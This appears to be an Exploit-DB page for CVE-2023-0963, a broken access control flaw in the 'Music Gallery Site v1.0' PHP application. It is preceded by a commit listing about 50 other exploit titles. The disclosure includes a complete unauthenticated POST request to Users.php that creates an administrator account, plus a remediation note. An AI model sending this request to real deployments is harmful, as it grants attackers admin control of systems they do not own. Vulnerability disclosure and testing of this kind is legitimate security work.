
50 changes to exploits/shellcodes/ghdb Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal and LFI ABUS Security Camera TVIP 20000-21150 - LFI_ RCE and SSH Root Access Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated) Osprey Pump Controller 1.0.1 - (eventFileSelected) Command Injection Osprey Pump Controller 1.0.1 - (pseudonym) Semi-blind Command Injection Osprey Pump Controller 1.0.1 - (userName) Blind Command Injection Osprey Pump Controller 1.0.1 - Administrator Backdoor Access Osprey Pump Controller 1.0.1 - Authentication Bypass Credentials Modification Osprey Pump Controller 1.0.1 - Cross-Site Request Forgery Osprey Pump Controller 1.0.1 - Predictable Session Token / Session Hijack Osprey Pump Controller 1.0.1 - Unauthenticated File Disclosure Osprey Pump Controller 1.0.1 - Unauthenticated Remote Code Execution Exploit Osprey Pump Controller v1.0.1 - Unauthenticated Reflected XSS WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated RCE HospitalRun 1.0.0-beta - Local Root Exploit for macOS Adobe Connect 10 - Username Disclosure craftercms 4.x.x - CORS EasyNas 1.1.0 - OS Command Injection Agilebio Lab Collector Electronic Lab Notebook v4.234 - Remote Code Execution (RCE) Art Gallery Management System Project in PHP v 1.0 - SQL injection atrocore 1.5.25 User interaction - Unauthenticated File upload - RCE Auto Dealer Management System 1.0 - Broken Access Control Exploit Auto Dealer Management System v1.0 - SQL Injection Auto Dealer Management System v1.0 - SQL Injection in sell_vehicle.php Auto Dealer Management System v1.0 - SQL Injection on manage_user.php Best pos Management System v1.0 - Remote Code Execution (RCE) on File Upload Best pos Management System v1.0 - SQL Injection ChurchCRM v4.5.3-121fcc1 - SQL Injection Dompdf 1.2.1 - Remote Code Execution (RCE) Employee Task Management System v1.0 - Broken Authentication Employee Task Management System v1.0 - SQL Injection on (task-details.php?task_id=?) Employee Task Management System v1.0 - SQL Injection on edit-task.php flatnux 2021-03.25 - Remote Code Execution (Authenticated) Intern Record System v1.0 - SQL Injection (Unauthenticated) Kimai-1.30.10 - SameSite Cookie-Vulnerability session hijacking LDAP Tool Box Self Service Password v1.5.2 - Account takeover Music Gallery Site v1.0 - Broken Access Control Music Gallery Site v1.0 - SQL Injection on music_list.php Music Gallery Site v1.0 - SQL Injection on page Master.php Music Gallery Site v1.0 - SQL Injection on page view_music_details.php POLR URL 2.3.0 - Shortener Admin Takeover Purchase Order Management-1.0 - Local File Inclusion Simple Food Ordering System v1.0 - Cross-Site Scripting (XSS) Simple Task Managing System v1.0 - SQL Injection (Unauthenticated) modoboa 2.0.4 - Admin TakeOver pdfkit v0.8.7.2 - Command Injection FileZilla Client 3.63.1 - 'TextShaping.dl' DLL Hijacking Windows 11 10.0.22000 - Backup service Privilege Escalation TitanFTP 2.0.1.2102 - Path traversal to Remote Code Execution (RCE) Unified Remote 3.13.0 - Remote Code Execution (RCE)
110 lines
No EOL
4.2 KiB
Text
110 lines
No EOL
4.2 KiB
Text
# Exploit Title: Music Gallery Site v1.0 - Broken Access Control
|
|
# Exploit Author: Muhammad Navaid Zafar Ansari
|
|
# Date: 21 February 2023
|
|
|
|
### CVE Assigned:
|
|
**[CVE-2023-0963](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0963)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0963) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0963)
|
|
|
|
### Vendor Homepage:
|
|
> https://www.sourcecodester.com
|
|
### Software Link:
|
|
> [Music Gallery Site](https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html)
|
|
### Version:
|
|
> v 1.0
|
|
|
|
# Tested on: Windows 11
|
|
|
|
### Broken Authentication:
|
|
> Broken Access Control is a type of security vulnerability that occurs when a web application fails to properly restrict users' access to certain resources and functionality. Access control is the process of ensuring that users are authorized to access only the resources and functionality that they are supposed to. Broken Access Control can occur due to poor implementation of access controls in the application, failure to validate input, or insufficient testing and review.
|
|
|
|
### Vulnerable URLs:
|
|
> /php-music/classes/Users.php
|
|
|
|
>/php-music/classes/Master.php
|
|
|
|
### Affected Page:
|
|
> Users.php , Master.php
|
|
> On these page, application isn't verifying the authenticated mechanism. Due to that, all the parameters are vulnerable to broken access control and any remote attacker could create and update the data into the application. Specifically, Users.php could allow to remote attacker to create a admin user without log-in to the application.
|
|
### Description:
|
|
> Broken access control allows any remote attacker to create, update and delete the data of the application. Specifically, adding the admin users
|
|
### Proof of Concept:
|
|
> Following steps are involved:
|
|
1. Send a POST request with required parameter to Users.php?f=save (See Below Request)
|
|
|
|
2. Request:
|
|
```
|
|
POST /php-music/classes/Users.php?f=save HTTP/1.1
|
|
Host: localhost
|
|
Content-Length: 876
|
|
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
|
|
Accept: */*
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjwBNagY7zt6cjYHp
|
|
X-Requested-With: XMLHttpRequest
|
|
sec-ch-ua-mobile: ?0
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
|
|
sec-ch-ua-platform: "Linux"
|
|
Origin: http://localhost
|
|
Sec-Fetch-Site: same-origin
|
|
Sec-Fetch-Mode: cors
|
|
Sec-Fetch-Dest: empty
|
|
Referer: http://localhost/php-music/admin/?page=user/manage_user
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: en-US,en;q=0.9
|
|
Connection: close
|
|
|
|
------WebKitFormBoundaryjwBNagY7zt6cjYHp
|
|
Content-Disposition: form-data; name="id"
|
|
|
|
|
|
------WebKitFormBoundaryjwBNagY7zt6cjYHp
|
|
Content-Disposition: form-data; name="firstname"
|
|
|
|
Test
|
|
------WebKitFormBoundaryjwBNagY7zt6cjYHp
|
|
Content-Disposition: form-data; name="middlename"
|
|
|
|
Admin
|
|
------WebKitFormBoundaryjwBNagY7zt6cjYHp
|
|
Content-Disposition: form-data; name="lastname"
|
|
|
|
Check
|
|
------WebKitFormBoundaryjwBNagY7zt6cjYHp
|
|
Content-Disposition: form-data; name="username"
|
|
|
|
testadmin
|
|
------WebKitFormBoundaryjwBNagY7zt6cjYHp
|
|
Content-Disposition: form-data; name="password"
|
|
|
|
test123
|
|
------WebKitFormBoundaryjwBNagY7zt6cjYHp
|
|
Content-Disposition: form-data; name="type"
|
|
|
|
1
|
|
------WebKitFormBoundaryjwBNagY7zt6cjYHp
|
|
Content-Disposition: form-data; name="img"; filename=""
|
|
Content-Type: application/octet-stream
|
|
|
|
|
|
------WebKitFormBoundaryjwBNagY7zt6cjYHp--
|
|
|
|
```
|
|
|
|
3. It will create the user by defining the valid values (see below screenshot of successfull response), Successful exploit screenshots are below (without cookie parameter)
|
|
|
|

|
|
|
|

|
|
|
|
4. Vulnerable Code Snippets:
|
|
|
|
Users.php
|
|
|
|

|
|
|
|
Master.php
|
|
|
|

|
|
|
|
|
|
### Recommendation:
|
|
> Whoever uses this CMS, should update the authorization mechanism on top of the Users.php , Master.php pages as per requirement to avoid a Broken Access Control attack: |